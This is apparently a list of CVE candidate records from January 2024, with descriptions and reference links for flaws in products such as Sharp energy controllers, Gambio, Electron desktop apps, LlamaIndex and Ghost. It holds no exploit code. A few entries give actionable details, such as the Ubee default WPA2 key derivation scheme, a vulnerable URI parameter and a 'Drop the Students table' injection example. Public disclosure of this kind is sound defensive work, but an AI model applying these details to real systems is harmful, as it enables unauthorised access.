CVE    2024    23787    Candidate    Path traversal vulnerability in Energy Management Controller with Cloud Services JH-RVB1 /JH-RV11 Ver.B0.1.9.1 and earlier allows a network-adjacent unauthenticated attacker to obtain an arbitrary file in the affected product.    MISC:https://jp.sharp/support/taiyo/info/JVNVU94591337_en.pdf   |   URL:https://jp.sharp/support/taiyo/info/JVNVU94591337_en.pdf   |   MISC:https://jp.sharp/support/taiyo/info/JVNVU94591337_jp.pdf   |   URL:https://jp.sharp/support/taiyo/info/JVNVU94591337_jp.pdf   |   MISC:https://jvn.jp/en/vu/JVNVU94591337/   |   URL:https://jvn.jp/en/vu/JVNVU94591337/    Assigned (20240122)
CVE    2024    23786    Candidate    Cross-site scripting vulnerability in Energy Management Controller with Cloud Services JH-RVB1 /JH-RV11 Ver.B0.1.9.1 and earlier allows a network-adjacent unauthenticated attacker to execute an arbitrary script on the web browser of the user who is accessing the management page of the affected product.    MISC:https://jp.sharp/support/taiyo/info/JVNVU94591337_en.pdf   |   URL:https://jp.sharp/support/taiyo/info/JVNVU94591337_en.pdf   |   MISC:https://jp.sharp/support/taiyo/info/JVNVU94591337_jp.pdf   |   URL:https://jp.sharp/support/taiyo/info/JVNVU94591337_jp.pdf   |   MISC:https://jvn.jp/en/vu/JVNVU94591337/   |   URL:https://jvn.jp/en/vu/JVNVU94591337/    Assigned (20240122)
CVE    2024    23785    Candidate    Cross-site request forgery vulnerability in Energy Management Controller with Cloud Services JH-RVB1 /JH-RV11 Ver.B0.1.9.1 and earlier allows a remote unauthenticated attacker to change the product settings.    MISC:https://jp.sharp/support/taiyo/info/JVNVU94591337_en.pdf   |   URL:https://jp.sharp/support/taiyo/info/JVNVU94591337_en.pdf   |   MISC:https://jp.sharp/support/taiyo/info/JVNVU94591337_jp.pdf   |   URL:https://jp.sharp/support/taiyo/info/JVNVU94591337_jp.pdf   |   MISC:https://jvn.jp/en/vu/JVNVU94591337/   |   URL:https://jvn.jp/en/vu/JVNVU94591337/    Assigned (20240122)
CVE    2024    23784    Candidate    Improper access control vulnerability exists in Energy Management Controller with Cloud Services JH-RVB1 /JH-RV11 Ver.B0.1.9.1 and earlier, which may allow a network-adjacent unauthenticated attacker to obtain a username and its hashed password displayed on the management page of the affected product.    MISC:https://jp.sharp/support/taiyo/info/JVNVU94591337_en.pdf   |   URL:https://jp.sharp/support/taiyo/info/JVNVU94591337_en.pdf   |   MISC:https://jp.sharp/support/taiyo/info/JVNVU94591337_jp.pdf   |   URL:https://jp.sharp/support/taiyo/info/JVNVU94591337_jp.pdf   |   MISC:https://jvn.jp/en/vu/JVNVU94591337/   |   URL:https://jvn.jp/en/vu/JVNVU94591337/    Assigned (20240122)
CVE    2024    23783    Candidate    Improper authentication vulnerability in Energy Management Controller with Cloud Services JH-RVB1 /JH-RV11 Ver.B0.1.9.1 and earlier allows a network-adjacent unauthenticated attacker to access the affected product without authentication.    MISC:https://jp.sharp/support/taiyo/info/JVNVU94591337_en.pdf   |   URL:https://jp.sharp/support/taiyo/info/JVNVU94591337_en.pdf   |   MISC:https://jp.sharp/support/taiyo/info/JVNVU94591337_jp.pdf   |   URL:https://jp.sharp/support/taiyo/info/JVNVU94591337_jp.pdf   |   MISC:https://jvn.jp/en/vu/JVNVU94591337/   |   URL:https://jvn.jp/en/vu/JVNVU94591337/    Assigned (20240122)
CVE    2024    23782    Candidate    Cross-site scripting vulnerability exists in a-blog cms Ver.3.1.x series versions prior to Ver.3.1.7, Ver.3.0.x series versions prior to Ver.3.0.29, Ver.2.11.x series versions prior to Ver.2.11.58, Ver.2.10.x series versions prior to Ver.2.10.50, and Ver.2.9.0 and earlier versions. If this vulnerability is exploited, a user with a contributor or higher privilege may execute an arbitrary script on the web browser of the user who accessed the website using the product.    MISC:https://developer.a-blogcms.jp/blog/news/JVN-34565930.html   |   URL:https://developer.a-blogcms.jp/blog/news/JVN-34565930.html   |   MISC:https://jvn.jp/en/jp/JVN34565930/   |   URL:https://jvn.jp/en/jp/JVN34565930/    Assigned (20240122)
CVE    2024    23775    Candidate    Integer Overflow vulnerability in Mbed TLS 2.x before 2.28.7 and 3.x before 3.5.2, allows attackers to cause a denial of service (DoS) via mbedtls_x509_set_extension().    FEDORA:FEDORA-2024-bfd98be425   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IIBPEYSVRK4IFLBSYJAWKH33YBNH5HR2/   |   FEDORA:FEDORA-2024-c7f1c839ac   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GP5UU7Z6LJNBLBT4SC5WWS2HDNMTFZH5/   |   MISC:https://mbed-tls.readthedocs.io/en/latest/security-advisories/mbedtls-security-advisory-2024-01-2/    Assigned (20240122)
CVE    2024    23771    Candidate    darkhttpd before 1.15 uses strcmp (which is not constant time) to verify authentication, which makes it easier for remote attackers to bypass authentication via a timing side channel.    MISC:https://github.com/emikulic/darkhttpd/commit/f477619d49f3c4de9ad59bd194265a48ddc03f04   |   MISC:https://github.com/emikulic/darkhttpd/compare/v1.14...v1.15   |   MLIST:[oss-security] 20240125 Re: darkhttpd: timing attack and local leak of HTTP basic auth credentials   |   URL:http://www.openwall.com/lists/oss-security/2024/01/25/1    Assigned (20240122)
CVE    2024    23770    Candidate    darkhttpd through 1.15 allows local users to discover credentials (for --auth) by listing processes and their arguments.    MISC:https://github.com/emikulic/darkhttpd/commit/2b339828b2a42a5fda105ea84934957a7d23e35d   |   MISC:https://github.com/emikulic/darkhttpd/compare/v1.14...v1.15   |   MLIST:[oss-security] 20240125 Re: darkhttpd: timing attack and local leak of HTTP basic auth credentials   |   URL:http://www.openwall.com/lists/oss-security/2024/01/25/1    Assigned (20240122)
CVE    2024    23769    Candidate    Improper privilege control for the named pipe in Samsung Magician PC Software 8.0.0 (for Windows) allows a local attacker to read privileged data.    MISC:https://semiconductor.samsung.com/support/quality-support/product-security-updates/    Assigned (20240122)
CVE    2024    23768    Candidate    Dremio before 24.3.1 allows path traversal. An authenticated user who has no privileges on certain folders (and the files and datasets in these folders) can access these folders, files, and datasets. To be successful, the user must have access to the source and at least one folder in the source. Affected versions are: 24.0.0 through 24.3.0, 23.0.0 through 23.2.3, and 22.0.0 through 22.2.2. Fixed versions are: 24.3.1 and later, 23.2.4 and later, and 22.2.3 and later.    MISC:https://docs.dremio.com/current/reference/bulletins/2024-01-12-01    Assigned (20240122)
CVE    2024    23764    Candidate    Certain WithSecure products allow Local Privilege Escalation. This affects WithSecure Client Security 15 and later, WithSecure Server Security 15 and later, WithSecure Email and Server Security 15 and later, and WithSecure Elements Endpoint Protection 17 and later.    MISC:https://www.withsecure.com/en/support/security-advisories   |   MISC:https://www.withsecure.com/en/support/security-advisories/cve-2024-23764    Assigned (20240122)
CVE    2024    23763    Candidate    SQL Injection vulnerability in Gambio through 4.9.2.0 allows attackers to run arbitrary SQL commands via crafted GET request using modifiers[attribute][] parameter.    MISC:https://herolab.usd.de/security-advisories/usd-2023-0047/    Assigned (20240122)
CVE    2024    23762    Candidate    Unrestricted File Upload vulnerability in Content Manager feature in Gambio 4.9.2.0 allows attackers to execute arbitrary code via upload of crafted PHP file.    MISC:https://herolab.usd.de/security-advisories/usd-2023-0049/    Assigned (20240122)
CVE    2024    23761    Candidate    Server Side Template Injection in Gambio 4.9.2.0 allows attackers to run arbitrary code via crafted smarty email template.    MISC:https://herolab.usd.de/security-advisories/usd-2023-0048/    Assigned (20240122)
CVE    2024    23760    Candidate    Cleartext Storage of Sensitive Information in Gambio 4.9.2.0 allows attackers to obtain sensitive information via error-handler.log.json and legacy-error-handler.log.txt under the webroot.    MISC:https://herolab.usd.de/security-advisories/usd-2023-0050/    Assigned (20240122)
CVE    2024    23759    Candidate    Deserialization of Untrusted Data in Gambio through 4.9.2.0 allows attackers to run arbitrary code via the "search" parameter of the "Parcelshopfinder/AddAddressBookEntry" function.    MISC:https://herolab.usd.de/security-advisories/usd-2023-0046/    Assigned (20240122)
CVE    2024    23758    Candidate    An issue discovered in Unisys Stealth 5.3.062.0 allows attackers to view sensitive information via the Enterprise ManagementInstaller_msi.log file.    MISC:https://public.support.unisys.com/common/public/vulnerability/NVD_Detail_Rpt.aspx?ID=70    Assigned (20240122)
CVE    2024    23756    Candidate    The HTTP PUT and DELETE methods are enabled in the Plone official Docker version 5.2.13 (5221), allowing unauthenticated attackers to execute dangerous actions such as uploading files to the server or deleting them.    MISC:https://github.com/c0d3x27/CVEs/tree/main/CVE-2024-23756    Assigned (20240122)
CVE    2024    23755    Candidate    ClickUp Desktop before 3.3.77 on macOS and Windows allows code injection because of specific Electron Fuses. There is inadequate protection against code injection through settings such as RunAsNode.    MISC:https://clickup.com/security/disclosures   |   MISC:https://clickup.com/terms/security-policy   |   MISC:https://www.electronjs.org/blog/statement-run-as-node-cves   |   MISC:https://www.electronjs.org/docs/latest/tutorial/fuses    Assigned (20240122)
CVE    2024    23752    Candidate    GenerateSDFPipeline in synthetic_dataframe in PandasAI (aka pandas-ai) through 1.5.17 allows attackers to trigger the generation of arbitrary Python code that is executed by SDFCodeExecutor. An attacker can create a dataframe that provides an English language specification of this Python code. NOTE: the vendor previously attempted to restrict code execution in response to a separate issue, CVE-2023-39660.    MISC:https://github.com/gventuri/pandas-ai/issues/868    Assigned (20240122)
CVE    2024    23751    Candidate    LlamaIndex (aka llama_index) through 0.9.34 allows SQL injection via the Text-to-SQL feature in NLSQLTableQueryEngine, SQLTableRetrieverQueryEngine, NLSQLRetriever, RetrieverQueryEngine, and PGVectorSQLQueryEngine. For example, an attacker might be able to delete this year's student records via "Drop the Students table" within English language input.    MISC:https://github.com/run-llama/llama_index/issues/9957    Assigned (20240122)
CVE    2024    23750    Candidate    MetaGPT through 0.6.4 allows the QaEngineer role to execute arbitrary code because RunCode.run_script() passes shell metacharacters to subprocess.Popen.    MISC:https://github.com/geekan/MetaGPT/issues/731    Assigned (20240122)
CVE    2024    23749    Candidate    KiTTY versions 0.76.1.13 and before are vulnerable to command injection via the filename variable. This occurs due to insufficient input sanitization and validation, failure to escape special characters, and insecure system calls (at lines 2369-2390). This allows an attacker to add inputs inside the filename variable, leading to arbitrary code execution.    FULLDISC:20240213 Buffer Overflow Vulnerabilities in KiTTY Start Duplicated Session Hostname (CVE-2024-25003) & Username (CVE-2024-25004) Variables   |   URL:http://seclists.org/fulldisclosure/2024/Feb/14   |   FULLDISC:20240213 Command Injection Vulnerability in KiTTY Get Remote File Through SCP Input (CVE-2024-23749)   |   URL:http://seclists.org/fulldisclosure/2024/Feb/13   |   MISC:http://packetstormsecurity.com/files/177031/KiTTY-0.76.1.13-Command-Injection.html   |   MISC:https://blog.defcesco.io/CVE-2024-23749    Assigned (20240121)
CVE    2024    23747    Candidate    The Moderna Sistemas ModernaNet Hospital Management System 2024 is susceptible to an Insecure Direct Object Reference (IDOR) vulnerability. This vulnerability resides in the system's handling of user data access through a /Modernanet/LAUDO/LAU0000100/Laudo?id= URI. By manipulating this id parameter, an attacker can gain access to sensitive medical information.    MISC:https://github.com/louiselalanne/CVE-2024-23747   |   MISC:https://modernasistemas.com.br/sitems/    Assigned (20240121)
CVE    2024    23746    Candidate    Miro Desktop 0.8.18 on macOS allows local Electron code injection via a complex series of steps that might be usable in some environments (bypass a kTCCServiceSystemPolicyAppBundles requirement via a file copy, an app.app/Contents rename, an asar modification, and a rename back to app.app/Contents).    MISC:https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection   |   MISC:https://github.com/louiselalanne/CVE-2024-23746   |   MISC:https://miro.com/about/   |   MISC:https://www.electronjs.org/blog/statement-run-as-node-cves    Assigned (20240121)
CVE    2024    23745    Candidate    ** DISPUTED ** In Notion Web Clipper 1.0.3(7), a .nib file is susceptible to the Dirty NIB attack. NIB files can be manipulated to execute arbitrary commands. Additionally, even if a NIB file is modified within an application, Gatekeeper may still permit the execution of the application, enabling the execution of arbitrary commands within the application's context. NOTE: the vendor's perspective is that this is simply an instance of CVE-2022-48505, cannot properly be categorized as a product-level vulnerability, and cannot have a product-level fix because it is about incorrect caching of file signatures on macOS.    MISC:https://blog.xpnsec.com/dirtynib/   |   MISC:https://chromium.googlesource.com/chromium/src/+/master/docs/security/faq.md#Why-arent-physically_local-attacks-in-Chromes-threat-model   |   MISC:https://github.com/louiselalanne/CVE-2024-23745    Assigned (20240121)
CVE    2024    23744    Candidate    An issue was discovered in Mbed TLS 3.5.1. There is persistent handshake denial if a client sends a TLS 1.3 ClientHello without extensions.    MISC:https://github.com/Mbed-TLS/mbedtls/issues/8694    Assigned (20240121)
CVE    2024    23743    Candidate    ** DISPUTED ** Notion through 3.1.0 on macOS might allow code execution because of RunAsNode and enableNodeClilnspectArguments. NOTE: the vendor states "the attacker must launch the Notion Desktop application with nonstandard flags that turn the Electron-based application into a Node.js execution environment."    MISC:https://github.com/V3x0r/CVE-2024-23743   |   MISC:https://github.com/r3ggi/electroniz3r   |   MISC:https://www.electronjs.org/blog/statement-run-as-node-cves    Assigned (20240121)
CVE    2024    23742    Candidate    ** DISPUTED ** An issue in Loom on macOS version 0.196.1 and before, allows remote attackers to execute arbitrary code via the RunAsNode and enableNodeClilnspectArguments settings. NOTE: the vendor disputes this because it requires local access to a victim's machine.    MISC:https://github.com/V3x0r/CVE-2024-23742   |   MISC:https://www.electronjs.org/blog/statement-run-as-node-cves    Assigned (20240121)
CVE    2024    23741    Candidate    An issue in Hyper on macOS version 3.4.1 and before, allows remote attackers to execute arbitrary code via the RunAsNode and enableNodeClilnspectArguments settings.    MISC:https://github.com/V3x0r/CVE-2024-23741   |   MISC:https://www.electronjs.org/blog/statement-run-as-node-cves    Assigned (20240121)
CVE    2024    23740    Candidate    An issue in Kap for macOS version 3.6.0 and before, allows remote attackers to execute arbitrary code via the RunAsNode and enableNodeClilnspectArguments settings.    MISC:https://github.com/V3x0r/CVE-2024-23740   |   MISC:https://www.electronjs.org/blog/statement-run-as-node-cves    Assigned (20240121)
CVE    2024    23739    Candidate    An issue in Discord for macOS version 0.0.291 and before, allows remote attackers to execute arbitrary code via the RunAsNode and enableNodeClilnspectArguments settings.    MISC:https://github.com/V3x0r/CVE-2024-23739   |   MISC:https://www.electronjs.org/blog/statement-run-as-node-cves    Assigned (20240121)
CVE    2024    23738    Candidate    ** DISPUTED ** An issue in Postman version 10.22 and before on macOS allows a remote attacker to execute arbitrary code via the RunAsNode and enableNodeClilnspectArguments settings. NOTE: the vendor states "we dispute the report's accuracy ... the configuration does not enable remote code execution.."    MISC:https://github.com/V3x0r/CVE-2024-23738   |   MISC:https://www.electronjs.org/blog/statement-run-as-node-cves    Assigned (20240121)
CVE    2024    23732    Candidate    The JSON loader in Embedchain before 0.1.57 allows a ReDoS (regular expression denial of service) via a long string to json.py.    MISC:https://github.com/embedchain/embedchain/compare/0.1.56...0.1.57   |   MISC:https://github.com/embedchain/embedchain/pull/1122    Assigned (20240121)
CVE    2024    23731    Candidate    The OpenAPI loader in Embedchain before 0.1.57 allows attackers to execute arbitrary code, related to the openapi.py yaml.load function argument.    MISC:https://github.com/embedchain/embedchain/compare/0.1.56...0.1.57   |   MISC:https://github.com/embedchain/embedchain/pull/1122    Assigned (20240121)
CVE    2024    23730    Candidate    The OpenAPI and ChatGPT plugin loaders in LlamaHub (aka llama-hub) before 0.0.67 allow attackers to execute arbitrary code because safe_load is not used for YAML.    MISC:https://github.com/run-llama/llama-hub/blob/v0.0.67/CHANGELOG.md   |   MISC:https://github.com/run-llama/llama-hub/pull/841/commits/9dc9c21a5c6d0226d1d2101c3121d4f085743d52   |   MISC:https://github.com/run-llama/llama-hub/releases/tag/v0.0.67    Assigned (20240121)
CVE    2024    23726    Candidate    Ubee DDW365 XCNDDW365 devices have predictable default WPA2 PSKs that could lead to unauthorized remote access. A remote attacker (in proximity to a Wi-Fi network) can derive the default WPA2-PSK value by observing a beacon frame. A PSK is generated by using the first six characters of the SSID and the last six of the BSSID, decrementing the last digit.    MISC:https://github.com/actuator/cve/blob/main/Ubee/CWE-1392.md    Assigned (20240121)
CVE    2024    23725    Candidate    Ghost before 5.76.0 allows XSS via a post excerpt in excerpt.js. An XSS payload can be rendered in post summaries.    MISC:https://github.com/TryGhost/Ghost/pull/17190   |   MISC:https://github.com/TryGhost/Ghost/releases/tag/v5.76.0    Assigned (20240121)
CVE    2024    23724    Candidate    ** DISPUTED ** Ghost through 5.76.0 allows stored XSS, and resultant privilege escalation in which a contributor can take over any account, via an SVG profile picture that contains JavaScript code to interact with the API on localhost TCP port 3001. NOTE: The discoverer reports that "The vendor does not view this as a valid vector."    MISC:https://github.com/RhinoSecurityLabs/CVEs/tree/master/CVE-2024-23724   |   MISC:https://github.com/TryGhost/Ghost/pull/19646   |   MISC:https://rhinosecuritylabs.com/blog/    Assigned (20240121)
CVE    2024    23721    Candidate    A Directory Traversal issue was discovered in process_post on Draytek Vigor3910 4.3.2.5 devices. When sending a certain POST request, it calls the function and exports information.    MISC:https://draytek.com   |   MISC:https://gist.github.com/rrrrrrri/8e9cac08eb4d9c01ab258bd5b0f8f7d8    Assigned (20240120)
CVE    2024    23717    Candidate    In access_secure_service_from_temp_bond of btm_sec.cc, there is a possible way to achieve keystroke injection due to improper input validation. This could lead to remote (proximal/adjacent) escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.    MISC:https://android.googlesource.com/platform/packages/modules/Bluetooth/+/c5c528beb6e1cfed3ec93a3a264084df32ce83c2   |   URL:https://android.googlesource.com/platform/packages/modules/Bluetooth/+/c5c528beb6e1cfed3ec93a3a264084df32ce83c2   |   MISC:https://source.android.com/security/bulletin/2024-03-01   |   URL:https://source.android.com/security/bulletin/2024-03-01    Assigned (20240120)
CVE    2024    2371    Candidate    Information exposure vulnerability in Korenix JetI/O 6550 affecting firmware version F208 Build:0817. The SNMP protocol uses plaintext to transfer data, allowing an attacker to intercept traffic and retrieve credentials.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso-sci/information-exposure-vulnerability-korenix-jetio-6550   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso-sci/information-exposure-vulnerability-korenix-jetio-6550    Assigned (20240311)
CVE    2024    2370    Candidate    ** REJECT ** DO NOT USE THIS CVE ID NUMBER. Consult IDs: CVE-2018-5341. Reason: This CVE Record is a duplicate of CVE-2018-5341. Notes: All CVE users should reference CVE-2018-5341 instead of this record.        Assigned (20240311)
CVE    2024    23689    Candidate    Exposure of sensitive information in exceptions in ClickHouse's clickhouse-r2dbc, com.clickhouse:clickhouse-jdbc, and com.clickhouse:clickhouse-client versions less than 0.4.6 allows unauthorized users to gain access to client certificate passwords via client exception logs. This occurs when 'sslkey' is specified and an exception, such as a ClickHouseException or SQLException, is thrown during database operations; the certificate password is then included in the logged exception message.    MISC:https://github.com/ClickHouse/clickhouse-java/issues/1331   |   URL:https://github.com/ClickHouse/clickhouse-java/issues/1331   |   MISC:https://github.com/ClickHouse/clickhouse-java/pull/1334   |   URL:https://github.com/ClickHouse/clickhouse-java/pull/1334   |   MISC:https://github.com/ClickHouse/clickhouse-java/releases/tag/v0.4.6   |   URL:https://github.com/ClickHouse/clickhouse-java/releases/tag/v0.4.6   |   MISC:https://github.com/ClickHouse/clickhouse-java/security/advisories/GHSA-g8ph-74m6-8m7r   |   URL:https://github.com/ClickHouse/clickhouse-java/security/advisories/GHSA-g8ph-74m6-8m7r   |   MISC:https://github.com/advisories/GHSA-g8ph-74m6-8m7r   |   URL:https://github.com/advisories/GHSA-g8ph-74m6-8m7r   |   MISC:https://vulncheck.com/advisories/vc-advisory-GHSA-g8ph-74m6-8m7r   |   URL:https://vulncheck.com/advisories/vc-advisory-GHSA-g8ph-74m6-8m7r    Assigned (20240119)
CVE    2024    23688    Candidate    Consensys Discovery versions less than 0.4.5 use the same AES/GCM nonce for the entire session; the nonce should ideally be unique for every message. The node's private key isn't compromised, only the session key generated for specific peer communication is exposed.    MISC:https://github.com/ConsenSys/discovery/security/advisories/GHSA-w3hj-wr2q-x83g   |   URL:https://github.com/ConsenSys/discovery/security/advisories/GHSA-w3hj-wr2q-x83g   |   MISC:https://github.com/advisories/GHSA-w3hj-wr2q-x83g   |   URL:https://github.com/advisories/GHSA-w3hj-wr2q-x83g   |   MISC:https://vulncheck.com/advisories/vc-advisory-GHSA-w3hj-wr2q-x83g   |   URL:https://vulncheck.com/advisories/vc-advisory-GHSA-w3hj-wr2q-x83g    Assigned (20240119)
CVE    2024    23687    Candidate    Hard-coded credentials in FOLIO mod-data-export-spring versions before 1.5.4 and from 2.0.0 to 2.0.2 allow unauthenticated users to access critical APIs, modify user data, modify configurations including single-sign-on, and manipulate fees/fines.    MISC:https://github.com/advisories/GHSA-vf78-3q9f-92g3   |   URL:https://github.com/advisories/GHSA-vf78-3q9f-92g3   |   MISC:https://github.com/folio-org/mod-data-export-spring/commit/93aff4566bff59e30f4121b5a2bda5b0b508a446   |   URL:https://github.com/folio-org/mod-data-export-spring/commit/93aff4566bff59e30f4121b5a2bda5b0b508a446   |   MISC:https://github.com/folio-org/mod-data-export-spring/security/advisories/GHSA-vf78-3q9f-92g3   |   URL:https://github.com/folio-org/mod-data-export-spring/security/advisories/GHSA-vf78-3q9f-92g3   |   MISC:https://vulncheck.com/advisories/vc-advisory-GHSA-vf78-3q9f-92g3   |   URL:https://vulncheck.com/advisories/vc-advisory-GHSA-vf78-3q9f-92g3   |   MISC:https://wiki.folio.org/x/hbMMBw   |   URL:https://wiki.folio.org/x/hbMMBw    Assigned (20240119)
CVE    2024    23686    Candidate    DependencyCheck for Maven 9.0.0 to 9.0.6, for CLI version 9.0.0 to 9.0.5, and for Ant versions 9.0.0 to 9.0.5, when used in debug mode, allows an attacker to recover the NVD API Key from a log file.    MISC:https://github.com/advisories/GHSA-qqhq-8r2c-c3f5   |   URL:https://github.com/advisories/GHSA-qqhq-8r2c-c3f5   |   MISC:https://github.com/jeremylong/DependencyCheck/security/advisories/GHSA-qqhq-8r2c-c3f5   |   URL:https://github.com/jeremylong/DependencyCheck/security/advisories/GHSA-qqhq-8r2c-c3f5   |   MISC:https://vulncheck.com/advisories/vc-advisory-GHSA-qqhq-8r2c-c3f5   |   URL:https://vulncheck.com/advisories/vc-advisory-GHSA-qqhq-8r2c-c3f5    Assigned (20240119)
CVE    2024    23685    Candidate    Hard-coded credentials in mod-remote-storage versions under 1.7.2 and from 2.0.0 to 2.0.3 allow unauthorized users to gain read access to mod-inventory-storage records including instances, holdings, items, contributor-types, and identifier-types.    MISC:https://github.com/advisories/GHSA-m8v7-469p-5x89   |   URL:https://github.com/advisories/GHSA-m8v7-469p-5x89   |   MISC:https://github.com/folio-org/mod-remote-storage/commit/57df495f76e9aa5be9ce7ce3a65f89b6dbcbc13b   |   URL:https://github.com/folio-org/mod-remote-storage/commit/57df495f76e9aa5be9ce7ce3a65f89b6dbcbc13b   |   MISC:https://github.com/folio-org/mod-remote-storage/security/advisories/GHSA-m8v7-469p-5x89   |   URL:https://github.com/folio-org/mod-remote-storage/security/advisories/GHSA-m8v7-469p-5x89   |   MISC:https://vulncheck.com/advisories/vc-advisory-GHSA-m8v7-469p-5x89   |   URL:https://vulncheck.com/advisories/vc-advisory-GHSA-m8v7-469p-5x89   |   MISC:https://wiki.folio.org/x/hbMMBw   |   URL:https://wiki.folio.org/x/hbMMBw    Assigned (20240119)
CVE    2024    23684    Candidate    Inefficient algorithmic complexity in DecodeFromBytes function in com.upokecenter.cbor Java implementation of Concise Binary Object Representation (CBOR) versions 4.0.0 to 4.5.1 allows an attacker to cause a denial of service by passing a maliciously crafted input. Depending on an application's use of this library, this may be a remote attacker.    MISC:https://github.com/advisories/GHSA-fj2w-wfgv-mwq6   |   URL:https://github.com/advisories/GHSA-fj2w-wfgv-mwq6   |   MISC:https://github.com/peteroupc/CBOR-Java/security/advisories/GHSA-fj2w-wfgv-mwq6   |   URL:https://github.com/peteroupc/CBOR-Java/security/advisories/GHSA-fj2w-wfgv-mwq6   |   MISC:https://vulncheck.com/advisories/vc-advisory-GHSA-fj2w-wfgv-mwq6   |   URL:https://vulncheck.com/advisories/vc-advisory-GHSA-fj2w-wfgv-mwq6    Assigned (20240119)
CVE    2024    23683    Candidate    Artemis Java Test Sandbox versions less than 1.7.6 are vulnerable to a sandbox escape when an attacker crafts a special subclass of InvocationTargetException. An attacker can abuse this issue to execute arbitrary Java when a victim executes the supposedly sandboxed code.    MISC:https://github.com/advisories/GHSA-883x-6fch-6wjx   |   URL:https://github.com/advisories/GHSA-883x-6fch-6wjx   |   MISC:https://github.com/ls1intum/Ares/commit/af4f28a56e2fe600d8750b3b415352a0a3217392   |   URL:https://github.com/ls1intum/Ares/commit/af4f28a56e2fe600d8750b3b415352a0a3217392   |   MISC:https://github.com/ls1intum/Ares/issues/15#issuecomment-996449371   |   URL:https://github.com/ls1intum/Ares/issues/15#issuecomment-996449371   |   MISC:https://github.com/ls1intum/Ares/releases/tag/1.7.6   |   URL:https://github.com/ls1intum/Ares/releases/tag/1.7.6   |   MISC:https://github.com/ls1intum/Ares/security/advisories/GHSA-883x-6fch-6wjx   |   URL:https://github.com/ls1intum/Ares/security/advisories/GHSA-883x-6fch-6wjx   |   MISC:https://vulncheck.com/advisories/vc-advisory-GHSA-883x-6fch-6wjx   |   URL:https://vulncheck.com/advisories/vc-advisory-GHSA-883x-6fch-6wjx    Assigned (20240119)
CVE    2024    23682    Candidate    Artemis Java Test Sandbox versions before 1.8.0 are vulnerable to a sandbox escape when an attacker includes class files in a package that Ares trusts. An attacker can abuse this issue to execute arbitrary Java when a victim executes the supposedly sandboxed code.    MISC:https://github.com/advisories/GHSA-227w-wv4j-67h4   |   URL:https://github.com/advisories/GHSA-227w-wv4j-67h4   |   MISC:https://github.com/ls1intum/Ares/issues/15   |   URL:https://github.com/ls1intum/Ares/issues/15   |   MISC:https://github.com/ls1intum/Ares/releases/tag/1.8.0   |   URL:https://github.com/ls1intum/Ares/releases/tag/1.8.0   |   MISC:https://github.com/ls1intum/Ares/security/advisories/GHSA-227w-wv4j-67h4   |   URL:https://github.com/ls1intum/Ares/security/advisories/GHSA-227w-wv4j-67h4   |   MISC:https://vulncheck.com/advisories/vc-advisory-GHSA-227w-wv4j-67h4   |   URL:https://vulncheck.com/advisories/vc-advisory-GHSA-227w-wv4j-67h4    Assigned (20240119)
CVE    2024    23681    Candidate    Artemis Java Test Sandbox versions before 1.11.2 are vulnerable to a sandbox escape when an attacker loads untrusted libraries using System.load or System.loadLibrary. An attacker can abuse this issue to execute arbitrary Java when a victim executes the supposedly sandboxed code.    MISC:https://github.com/advisories/GHSA-98hq-4wmw-98w9   |   URL:https://github.com/advisories/GHSA-98hq-4wmw-98w9   |   MISC:https://github.com/ls1intum/Ares/security/advisories/GHSA-98hq-4wmw-98w9   |   URL:https://github.com/ls1intum/Ares/security/advisories/GHSA-98hq-4wmw-98w9   |   MISC:https://vulncheck.com/advisories/vc-advisory-GHSA-98hq-4wmw-98w9   |   URL:https://vulncheck.com/advisories/vc-advisory-GHSA-98hq-4wmw-98w9    Assigned (20240119)
CVE    2024    23680    Candidate    AWS Encryption SDK for Java versions 2.0.0 to 2.2.0 and less than 1.9.0 incorrectly validates some invalid ECDSA signatures.    MISC:https://github.com/advisories/GHSA-55xh-53m6-936r   |   URL:https://github.com/advisories/GHSA-55xh-53m6-936r   |   MISC:https://github.com/aws/aws-encryption-sdk-java/security/advisories/GHSA-55xh-53m6-936r   |   URL:https://github.com/aws/aws-encryption-sdk-java/security/advisories/GHSA-55xh-53m6-936r   |   MISC:https://vulncheck.com/advisories/vc-advisory-GHSA-55xh-53m6-936r   |   URL:https://vulncheck.com/advisories/vc-advisory-GHSA-55xh-53m6-936r    Assigned (20240119)
CVE    2024    23679    Candidate    Enonic XP versions less than 7.7.4 are vulnerable to a session fixation issue. A remote and unauthenticated attacker can use prior sessions due to the lack of invalidating session attributes.    MISC:https://github.com/advisories/GHSA-4m5p-5w5w-3jcf   |   URL:https://github.com/advisories/GHSA-4m5p-5w5w-3jcf   |   MISC:https://github.com/enonic/xp/commit/0189975691e9e6407a9fee87006f730e84f734ff   |   URL:https://github.com/enonic/xp/commit/0189975691e9e6407a9fee87006f730e84f734ff   |   MISC:https://github.com/enonic/xp/commit/1f44674eb9ab3fbab7103e8d08067846e88bace4   |   URL:https://github.com/enonic/xp/commit/1f44674eb9ab3fbab7103e8d08067846e88bace4   |   MISC:https://github.com/enonic/xp/commit/2abac31cec8679074debc4f1fb69c25930e40842   |   URL:https://github.com/enonic/xp/commit/2abac31cec8679074debc4f1fb69c25930e40842   |   MISC:https://github.com/enonic/xp/issues/9253   |   URL:https://github.com/enonic/xp/issues/9253   |   MISC:https://github.com/enonic/xp/security/advisories/GHSA-4m5p-5w5w-3jcf   |   URL:https://github.com/enonic/xp/security/advisories/GHSA-4m5p-5w5w-3jcf   |   MISC:https://vulncheck.com/advisories/vc-advisory-GHSA-4m5p-5w5w-3jcf   |   URL:https://vulncheck.com/advisories/vc-advisory-GHSA-4m5p-5w5w-3jcf    Assigned (20240119)
CVE    2024    23678    Candidate    In Splunk Enterprise for Windows versions below 9.0.8 and 9.1.3, Splunk Enterprise does not correctly sanitize path input data. This results in the unsafe deserialization of untrusted data from a separate disk partition on the machine. This vulnerability only affects Splunk Enterprise for Windows.    MISC:https://advisory.splunk.com/advisories/SVD-2024-0108   |   URL:https://advisory.splunk.com/advisories/SVD-2024-0108   |   MISC:https://research.splunk.com/application/947d4d2e-1b64-41fc-b32a-736ddb88ce97/   |   URL:https://research.splunk.com/application/947d4d2e-1b64-41fc-b32a-736ddb88ce97/    Assigned (20240119)
